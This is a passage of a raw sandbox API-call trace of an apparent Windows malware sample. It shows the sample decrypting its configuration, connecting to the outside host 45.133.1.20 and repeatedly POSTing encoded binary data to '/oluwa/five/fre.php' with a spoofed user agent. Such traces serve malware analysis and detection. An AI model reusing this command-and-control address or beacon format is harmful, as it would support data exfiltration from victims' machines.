pbData=0x418960, dwFlags=0x0) returned 1 [0275.470] GetProcessHeap () returned 0x6a0000 [0275.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0275.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.484] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0275.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.485] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0275.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.486] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0275.486] GetProcessHeap () returned 0x6a0000 [0275.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0275.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.487] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0275.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.488] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0275.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.489] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0275.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.490] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0275.490] GetProcessHeap () returned 0x6a0000 [0275.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0275.490] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0275.490] GetProcessHeap () returned 0x6a0000 [0275.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0275.490] socket (af=2, type=1, protocol=6) returned 0x9d4 [0275.490] connect (s=0x9d4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0275.517] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0275.517] GetProcessHeap () returned 0x6a0000 [0275.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0275.518] GetProcessHeap () returned 0x6a0000 [0275.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0275.518] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0275.519] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0275.519] GetProcessHeap () returned 0x6a0000 [0275.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba230 [0275.519] GetProcessHeap () returned 0x6a0000 [0275.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0275.520] GetProcessHeap () returned 0x6a0000 [0275.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0275.520] GetProcessHeap () returned 0x6a0000 [0275.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0275.521] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0275.522] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0275.525] GetProcessHeap () returned 0x6a0000 [0275.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0275.525] GetProcessHeap () returned 0x6a0000 [0275.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0275.526] send (s=0x9d4, buf=0x6bd460*, len=242, flags=0) returned 242 [0275.527] send (s=0x9d4, buf=0x6bb998*, len=159, flags=0) returned 159 [0275.527] GetProcessHeap () returned 0x6a0000 [0275.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0275.527] recv (in: s=0x9d4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0275.592] GetProcessHeap () returned 0x6a0000 [0275.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0275.592] GetProcessHeap () returned 0x6a0000 [0275.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0275.595] GetProcessHeap () returned 0x6a0000 [0275.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba230 | out: hHeap=0x6a0000) returned 1 [0275.595] GetProcessHeap () returned 0x6a0000 [0275.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0275.596] closesocket (s=0x9d4) returned 0 [0275.596] GetProcessHeap () returned 0x6a0000 [0275.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0275.596] GetProcessHeap () returned 0x6a0000 [0275.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0275.597] GetProcessHeap () returned 0x6a0000 [0275.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0275.598] GetProcessHeap () returned 0x6a0000 [0275.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0275.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1768) returned 0x9d4 [0275.601] Sleep (dwMilliseconds=0xea60) [0275.604] GetProcessHeap () returned 0x6a0000 [0275.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0275.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.605] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.612] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0275.621] GetProcessHeap () returned 0x6a0000 [0275.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0275.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.623] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0275.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.623] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.624] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.624] GetProcessHeap () returned 0x6a0000 [0275.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0275.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.628] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0275.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.629] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0275.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.630] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0275.630] GetProcessHeap () returned 0x6a0000 [0275.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0275.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.631] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.645] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.646] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.647] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.647] GetProcessHeap () returned 0x6a0000 [0275.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0275.647] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0275.647] GetProcessHeap () returned 0x6a0000 [0275.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0275.648] GetProcessHeap () returned 0x6a0000 [0275.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0275.649] GetProcessHeap () returned 0x6a0000 [0275.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0275.650] GetProcessHeap () returned 0x6a0000 [0275.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0275.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.651] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.656] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0275.664] GetProcessHeap () returned 0x6a0000 [0275.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0275.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.665] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0275.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.666] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.667] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.667] GetProcessHeap () returned 0x6a0000 [0275.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0275.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.671] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0275.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.672] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0275.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.673] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0275.673] GetProcessHeap () returned 0x6a0000 [0275.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0275.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.674] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0275.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.675] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0275.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.676] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0275.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.677] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0275.677] GetProcessHeap () returned 0x6a0000 [0275.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0275.677] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0275.677] GetProcessHeap () returned 0x6a0000 [0275.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0275.677] socket (af=2, type=1, protocol=6) returned 0x9d8 [0275.677] connect (s=0x9d8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0275.706] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0275.706] GetProcessHeap () returned 0x6a0000 [0275.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0275.707] GetProcessHeap () returned 0x6a0000 [0275.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0275.708] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0275.710] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0275.711] GetProcessHeap () returned 0x6a0000 [0275.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9f30 [0275.711] GetProcessHeap () returned 0x6a0000 [0275.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0275.712] GetProcessHeap () returned 0x6a0000 [0275.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0275.712] GetProcessHeap () returned 0x6a0000 [0275.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0275.713] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0275.715] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0275.715] GetProcessHeap () returned 0x6a0000 [0275.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0275.715] GetProcessHeap () returned 0x6a0000 [0275.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0275.716] send (s=0x9d8, buf=0x6bd460*, len=242, flags=0) returned 242 [0275.717] send (s=0x9d8, buf=0x6bb998*, len=159, flags=0) returned 159 [0275.717] GetProcessHeap () returned 0x6a0000 [0275.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0275.717] recv (in: s=0x9d8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0275.794] GetProcessHeap () returned 0x6a0000 [0275.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0275.795] GetProcessHeap () returned 0x6a0000 [0275.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0275.796] GetProcessHeap () returned 0x6a0000 [0275.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f30 | out: hHeap=0x6a0000) returned 1 [0275.797] GetProcessHeap () returned 0x6a0000 [0275.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0275.797] closesocket (s=0x9d8) returned 0 [0275.798] GetProcessHeap () returned 0x6a0000 [0275.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0275.798] GetProcessHeap () returned 0x6a0000 [0275.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0275.798] GetProcessHeap () returned 0x6a0000 [0275.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0275.799] GetProcessHeap () returned 0x6a0000 [0275.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0275.799] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x176c) returned 0x9d8 [0275.801] Sleep (dwMilliseconds=0xea60) [0275.802] GetProcessHeap () returned 0x6a0000 [0275.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0275.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.805] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.812] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0275.820] GetProcessHeap () returned 0x6a0000 [0275.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0275.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.821] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0275.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.822] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.825] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.825] GetProcessHeap () returned 0x6a0000 [0275.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0275.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.827] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0275.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.828] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0275.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.829] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0275.829] GetProcessHeap () returned 0x6a0000 [0275.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0275.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.830] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.831] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.832] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.840] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.840] GetProcessHeap () returned 0x6a0000 [0275.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0275.840] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0275.840] GetProcessHeap () returned 0x6a0000 [0275.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0275.841] GetProcessHeap () returned 0x6a0000 [0275.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0275.841] GetProcessHeap () returned 0x6a0000 [0275.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0275.841] GetProcessHeap () returned 0x6a0000 [0275.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0275.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.843] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.853] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0275.861] GetProcessHeap () returned 0x6a0000 [0275.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0275.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.862] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0275.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.863] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.864] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.865] GetProcessHeap () returned 0x6a0000 [0275.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0275.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.866] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0275.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.871] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0275.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.872] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0275.872] GetProcessHeap () returned 0x6a0000 [0275.872] RtlAllocateHeap (HeapHandle=0x6a0000, 